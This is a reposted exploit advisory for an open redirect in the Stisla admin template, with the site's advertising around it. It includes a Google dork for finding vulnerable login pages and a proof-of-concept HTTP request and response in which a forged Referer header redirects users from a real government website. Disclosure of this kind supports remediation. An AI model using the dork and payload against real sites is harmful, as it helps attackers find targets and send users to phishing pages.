Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.io


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022050037

Below is a copy:

Stisla - Open Redirect Vulnerability
#############################################################
# Exploit Title: Stisla - Open Redirect Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: The A Team - Kejaksaan Agung RI
# Google Dork: intitle:"Login  Stisla"
# Software Vendor: Stisla (Muhamad Nauval Azhar)
# Software Version: *
# Software Link: https://github.com/stisla/stisla
# Date: 2022-05-09

#############################################################
[*] About:
----------
Stisla is a Free Bootstrap Admin Template which will help you to speed up your project and design your own dashboard UI. Users will love it.

#############################################################
[*] Detail:
-----------
Input passed via the 'Referer' header field is not properly verified before being used to redirect users.

#############################################################
[*] Impact:
-----------
Redirecting user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

#############################################################
[*] Remediation:
----------------
Instead of redirecting users to the same page through referrer, developer can redirect them directly without grabbing from the referrer.

#############################################################
[*] PoC:
--------
# Request:
POST /login HTTP/1.1
Host: pustakadata.semarangkota.go.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://cxsecurity.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Origin: https://pustakadata.semarangkota.go.id
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
Pragma: no-cache
Cache-Control: no-cache

# Response:
HTTP/1.1 302 Found
Date: Mon, 09 May 2022 06:18:20 GMT
Server: Apache
X-Powered-By: PHP/7.2.34
Cache-Control: no-cache, private
Location: https://cxsecurity.com/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 196
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.